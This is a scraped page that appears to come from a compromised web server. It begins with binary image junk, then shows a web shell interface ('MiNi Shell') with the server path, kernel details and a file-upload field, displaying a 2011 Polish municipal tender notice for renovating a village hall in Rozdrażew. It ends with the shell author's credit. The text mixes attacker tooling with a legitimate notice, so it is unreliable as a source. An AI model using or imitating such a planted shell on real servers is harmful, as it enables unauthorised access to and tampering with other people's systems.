JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110518/118108-N-2011.html

<p class="kh_header"><b>Rozdrażew: Remont świetlicy wiejskiej w Rozdrażewie wraz    
z zagospodarowaniem terenu przyległego</b><br>
<b>Numer ogłoszenia: 118108 - 2011; data zamieszczenia: 18.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rozdrażew , ul. Rynek 3, 63-708 Rozdrażew, woj. wielkopolskie, tel. 062 7221305, faks 062 7221370.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlicy wiejskiej w Rozdrażewie wraz    
z zagospodarowaniem terenu przyległego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje :
1. remont dachu  ( renowacja dachu przy użyciu systemu dachowych płyt hybrydowych Alfa EPS 150 Alu Systan SBS -251 m2 lub analogicznego; rozebranie i  zamontowanie nowych rynien dachowych i spustowych -37 mb;  rozbiórka i ponowne wykonanie obróbek  blacharskich- 13 m2;  wymiana instalacji odgromowej obiektu wraz z pomiarami)
2. taras z podjazdem dla niepełnosprawnych ( rozebranie balustrad, posadzek cementowych i murów z cegły; wywiezienie gruzu z terenu rozbiórki  101 m3; wykonanie ław fundamentowych żelbetowych i z bloczków betonowych 27 m3; wyprawa elewacyjna cienkowarstwowa z akrylowych tynków dekoracyjnych 21,84 m2; podkłady z piasku 84 m3; chodniki z kostki brukowej o grubości 6 cm - 129 m2; balustrady z pochwytem stalowym, tarasowe  39,76 mb.
3. remont elewacji ( malowanie tynków zewnętrznych farbami silikonowymi  137,3 m2)
 4. roboty remontowe wewnętrzne ( rozebranie posadzek z klepki parkietowej 179,55 m2; roboty rozbiórkowe elementów konstrukcji betonowych i wywiezienie gruzu 41.97 m3; podkłady betonowe, izolacje cieplne i przeciwdźwiękowe, warstwy wyrównawcze - 179,55 m2; posadzki z deszczółek na kleju-parkiet dębowy + lakierowanie-179,55m2,sufity podwieszane o konstrukcji metalowej z wypełnieniem płytami z włókien mineralnych- 215 m2;malowanie wewnętrzne farbami emulsyjnymi z gruntowaniem podłoża i wykonaniem gładzi gipsowych 584,5 m2)
5.instalacja elektryczna wewnętrzna ( demontaż i ponowny montaż opraw oświetleniowych;wymiana rozdzielnicy wnękowej dwulicznikowej z 4 zabezpieczeniami S-35A i osłoną plombowaną, z 30 zabezpieczeniami typu S 25 A z osłonami nieplombowanymi, listwami zaciskowymi N,PE, drzwiczkami zamykanymi na zamek patentowy i okienkami do  odczytu liczników, z oznaczeniem  opisu aparatury - rozdzielnica kompletna)
 6.utwardzenie terenu ( rozebranie nawierzchni mineralno-bitumicznych 388,5 m2: 
 korytowanie pod chodniki, wykonanie podbudowy z kruszywa-388,5m2; nawierzchnie z kostki brukowej  grubości 8 cm-388,5 m2; krawężniki betonowe - 35 m)
 Szczegółowy opis i zakres zadania został określony w przedmiarze robót, dokumentacji projektowej a także w specyfikacjach technicznych wykonania i odbioru robót- dokumenty  te są załącznikami do niniejszej specyfikacji.

Uwaga: kolorystyka  ścian do uzgodnienia z Zamawiającym w trakcie realizacji zadania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Montaż c.o.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.44.21.00-8, 45.23.32.51-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości 10 000,00 zł (słownie: dziesięćtysięcyzłotych 00/100).
2. Wadium musi być wniesione przed upływem terminu do składania ofert tj. do dnia 
    01.06. 2011 r. do godz. 9:00.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
     a) pieniądzu, przelewem na rachunek bankowy Zamawiającego wskazany
     w punkcie 4. niniejszego rozdziału,
     b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy
     oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze 
     poręczeniem pieniężnym,
    c) gwarancjach bankowych,
    d) gwarancjach ubezpieczeniowych,
    e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 
        pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji 
        Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. Jeżeli wadium wniesione zostanie w pieniądzu, przelewem, Wykonawca dołącza
    do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu.
    Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy 
    Zamawiającego

            Urząd  Gminy  Rozdrażew
            Bank Spółdzielczy  Dobrzyca O/Rozdrażew
            numer konta: 78 8409 0001 0200 0215 2000 0001
    Na poleceniu przelewu należy wpisać: Wadium - remont świetlicy wiejskiej w     
    Rozdrażewie wraz z zagospodarowaniem terenu przyległego.
5. W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego
     wniesieniu w terminie decydować będzie data wpływu środków na rachunek
      bankowy Zamawiającego wskazany w punkcie 4 niniejszego rozdziału.
6. W przypadku wnoszenia wadium w innych formach niż w pieniądzu, wymagane
     jest dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego i 
     złożenie w kasie Urzędu Gminy, najpóźniej w terminie wskazanym w punkcie 2 
     rozdziału. Kopię poświadczoną za zgodność z oryginałem należy załączyć do 
     oferty.
     Dokumenty, o których mowa w punkcie 3.b-e. muszą zachować ważność przez 
     cały okres w którym Wykonawca jest związany ofertą.
7. Wykonawca , którego oferta nie będzie zabezpieczona wadium odpowiadającym 
   powyższym wymaganiom, zostanie wykluczony z ubiegania się o udzielenie 
   zamówienia.
8. Zamawiający zwraca  wadium wszystkim wykonawcom niezwłocznie po wyborze 
    oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem 
    wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z 
    zastrzeżeniem ust.4a ustawy PZP.   
9. Zamawiający,  zwraca niezwłocznie wadium na wniosek Wykonawcy, który 
    wycofał ofertę przed upływem terminu składania ofert.   
 10. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami
    wynikającymi z umowy rachunku bankowego, na którym było ono    
    przechowywane,pomniejszone o koszty prowadzenia rachunku bankowego oraz 
    prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez 
    Wykonawcę.                
 11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
    a) Wykonawca, którego oferta została wybrana odmówił podpisania umowy w 
    sprawie zamówienia publicznego na warunkach określonych w ofercie,
    b) Wykonawca, którego oferta została wybrana nie wniósł wymaganego 
    zabezpieczenia  należytego wykonania umowy,
    c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe
       z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży aktualny wypis z właściwego  rejestru  wystawiony nie wcześniej niż 6 miesięcy przed upływem składania ofert a osoby fizyczne  będące przedsiębiorcami złożą oświadczenie, że prowadzą działalność gospodarczą i w jakim zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca udokumentuje wykonanie w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, przynajmniej trzy zadania polegające na wybudowaniu lub remoncie obiektów podobnych co  do zakresu robót, o wartości  150 000 zł  każda z robót. Wykaz musi zawierać daty i miejsca  wykonania, rodzaj i wartość robót, adres inwestora wraz z załączeniem dokumentów potwierdzających, że roboty  zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo 
ukończone ( Należy dołączyć kserokopie protokółów końcowych odbioru robót)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca dysponuje  sprzętem technicznym w ilości co   
         najmniej:  - koparko-ładowarką
                          - zagęszczarką gruntu
                          - samochodem samowyładowczym
                           - zestawem narzędzi do obróbek blacharskich i cyklinowania 
                             parkietu
                           - zestawem narzędzi malarskich
                           - zestawem  rusztowań wysokościowych
                           - samochodem dostawczym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca dysponuje  sprzętem technicznym w ilości co  najmniej:
 - jedną  sześciooosobową  brygadą roboczą			
 - 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji w 
   budownictwie w zakresie kierowania budową w specjalności konstrukcyjno-
   budowlanej,  przewidzianą do pełnienia funkcji kierownika budowy,
 -1 osobą posiadającą uprawnienia do  pełnienia samodzielnych funkcji w 
   budownictwie w specjalności drogowej  przewidzianą do pełnienia funkcji 
   kierownika robót,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże że posiada dostęp lub dysponuje środkami finansowymi  w wysokości 50% zaoferowanej ceny brutto  oraz  jest ubezpieczony od odpowiedzialności  cywilnej  w zakresie prowadzonej działalności związanej z związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą  niż 300 000,00 zł .  
Polisa winna być opłacona na czas związania z ofertą a  przypadku, gdy polisa nie obejmuje czasu trwania zamówienia Wykonawca złoży oświadczenie o kontynuacji  ubezpieczenia do terminu zakończenia robót.

Ocena spełnienia wyżej wyniesionych warunków dokonana zostanie zgodnie z formułą  spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale IX niniejszej specyfikacji. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wykonawca zobowiązany jest do podpisania umowy na warunkach podanych w projekcie umowy stanowiącym załącznik Nr 8 do SIWZ.
2. Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy w przypadku wystąpienia  okoliczności, których nie można było przewidzieć w chwili zawarcia umowy m.in. w przypadku:
       a) wystąpienia nieprzewidzianych prac, mających wpływ na prawidłowe 
       wykonanie przedmiotu umowy, których realizacja powoduje konieczność 
       przedłużenia terminu umowy  podstawowej. Zamawiający dopuszcza 
       możliwość przedłużenia tego terminu o okres niezbędny do realizacji w/w prac;
       b) gdy zmiany będą korzystne dla zamawiającego i będą leżały w interesie 
       publicznym;
       c) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym 
       wpływ na realizację przedmiotu zamówienia.
3. Wskazane powyżej zmiany mogą być wprowadzone, jedynie w przypadku, jeżeli 
    obie strony umowy zgodnie uznają, że zaszły wskazane okoliczności oraz 
    wprowadzenie zmian jest konieczne dla prawidłowej realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rozdrazew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
ul. Rynek 3
63-708 Rozdrazew
p. nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2011 godzina 09:30, miejsce: Urząd Gminy
ul. Rynek 3
63-708 Rozdrazew
p. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com